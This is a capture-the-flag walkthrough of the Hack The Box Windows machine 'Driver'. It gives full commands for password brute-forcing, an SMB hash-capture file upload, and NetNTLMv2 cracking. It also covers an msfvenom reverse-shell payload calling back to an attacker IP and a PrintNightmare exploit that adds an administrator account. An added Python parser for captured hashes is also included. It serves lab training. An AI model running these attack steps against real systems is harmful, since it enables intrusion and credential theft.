Hackthebox - Driver
Windows
Nmap
Port 80
Inspecting with burp
The response header when trying to authenticate gives this (we can also see it in the nmap scan):
So we get a username. We can try to brute-force the password with hydra:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.11.106 http-get
So we have the credentials admin:admin.
There is a file upload functionality, and the page says the file will go in the share. It bugged me for a while, and then I remembered the URL file attack, so I uploaded this file.
I named it with an @ at the beginning, for instance:
@csbygb
Then we need to launch Responder with its SMB server enabled (on by default):
responder -w --lm -v -I tun0
Now we just have to crack one of the captured NetNTLMv2 hashes with hashcat.
We just need to copy a whole one, like this:
tony::DRIVER:a05acd47ab1ac310:B15097FF39CD452C8F8E53BDC33B7B37:0101000000000000DF515CFA2F5DD801D1688BA244C5025400000000020000000000000000000000
And then launch hashcat as follows:
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
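The line above is in the hashcat -m 5600 layout (USER::DOMAIN:SERVER_CHALLENGE:NTPROOFSTR:BLOB). As an added example that is not part of the original writeup, here is a small Python parser that splits such a line into its fields and decodes the NTLMv2 blob, whose FILETIME timestamp, client challenge and AV pairs (as laid out in MS-NLMP) tell an analyst when a captured hash was produced and which target the client was authenticating to; the sample input is the capture line quoted above.

```python
from datetime import datetime, timedelta, timezone

# MsvAvId values from the AV_PAIR definition in MS-NLMP; ids 1-5 and 9 carry UTF-16LE strings
AV_IDS = {0: "MsvAvEOL", 1: "MsvAvNbComputerName", 2: "MsvAvNbDomainName",
          3: "MsvAvDnsComputerName", 4: "MsvAvDnsDomainName", 5: "MsvAvDnsTreeName",
          6: "MsvAvFlags", 7: "MsvAvTimestamp", 9: "MsvAvTargetName"}
STRING_AV = {1, 2, 3, 4, 5, 9}
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

def filetime_to_datetime(ft):
    """FILETIME is a count of 100 ns ticks since 1601-01-01 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)

def parse_av_pairs(data):
    """Walk the AV_PAIR list; stop at MsvAvEOL or when a truncated blob runs out."""
    pairs, off = {}, 0
    while off + 4 <= len(data):
        av_id = int.from_bytes(data[off:off + 2], "little")
        av_len = int.from_bytes(data[off + 2:off + 4], "little")
        value = data[off + 4:off + 4 + av_len]
        off += 4 + av_len
        if av_id == 0:
            break
        name = AV_IDS.get(av_id, f"MsvAvUnknown{av_id}")
        pairs[name] = value.decode("utf-16-le", "replace") if av_id in STRING_AV else value.hex()
    return pairs

def parse_netntlmv2(line):
    """Split USER::DOMAIN:SERVER_CHALLENGE:NTPROOFSTR:BLOB and decode the blob."""
    parts = line.strip().split(":")
    if len(parts) != 6 or parts[1] != "":
        raise ValueError("expected USER::DOMAIN:CHALLENGE:NTPROOFSTR:BLOB")
    user, _, domain, challenge, proof, blob_hex = parts
    if len(challenge) != 16 or len(proof) != 32:
        raise ValueError("server challenge is 8 bytes, NTProofStr is 16 bytes")
    blob = bytes.fromhex(blob_hex)
    # NTLMv2_CLIENT_CHALLENGE: RespType=1, HiRespType=1, 6 reserved bytes, FILETIME,
    # 8-byte client challenge, 4 reserved bytes, then the AV_PAIR list
    if len(blob) < 28 or blob[0] != 1 or blob[1] != 1:
        raise ValueError("blob is not an NTLMv2_CLIENT_CHALLENGE structure")
    return {"user": user, "domain": domain,
            "server_challenge": challenge.lower(), "nt_proof_str": proof.lower(),
            "timestamp": filetime_to_datetime(int.from_bytes(blob[8:16], "little")),
            "client_challenge": blob[16:24].hex(),
            "av_pairs": parse_av_pairs(blob[28:])}

# Sample input: the capture line quoted in this writeup
SAMPLE = ("tony::DRIVER:a05acd47ab1ac310:B15097FF39CD452C8F8E53BDC33B7B37:"
          "0101000000000000DF515CFA2F5DD801D1688BA244C5025400000000020000000000000000000000")
```

On the sample line the decoded timestamp is 2022-05-01 07:49:25 UTC, the moment the client answered the SMB challenge; the AV pair list in this quoted copy is short, which the parser tolerates.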
Let's see what shares we have
Let's get a shell with evil-winrm
evil-winrm -i 10.10.11.106 -u tony -p liltony
It works! Let's grab the user flag from tony's desktop.
Privesc
Let's get winPEAS and execute it on the target.
On our Kali machine:
wget https://github.com/carlospolop/PEASS-ng/releases/download/20220424/winPEASx64.exe
Now we just have to upload it to the target with evil-winrm. It is really easy, we just need to type:
upload winPEASx64.exe
And we launch it:
.\winPEASx64.exe
If we google the specific driver, we find it has a privesc vulnerability.
Let's get a shell with msfconsole so that we can privesc using a Metasploit module:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.2 LPORT=4444 -f exe -o reverse2.exe
In our evil-winrm shell:
upload reverse.exe
I got annoyed with this exploit because I could not make it work.
I decided to use PrintNightmare instead:
wget https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1
From evil-winrm:
upload CVE-2021-1675.ps1
Import-Module .\CVE-2021-1675.ps1
Get-Command Invoke-Nightmare
Invoke-Nightmare -NewUser "csbygb" -NewPassword "csbygb123!"
Finally, if we run net user on the new account, we see it is in the Administrators group:
net user csbygb
Now we just need to use evil-winrm with our new user:
evil-winrm -i 10.10.11.106 -u csbygb -p csbygb123!
And we can grab the admin flag:
cd C:\Users\Administrator\Desktop
type root.txt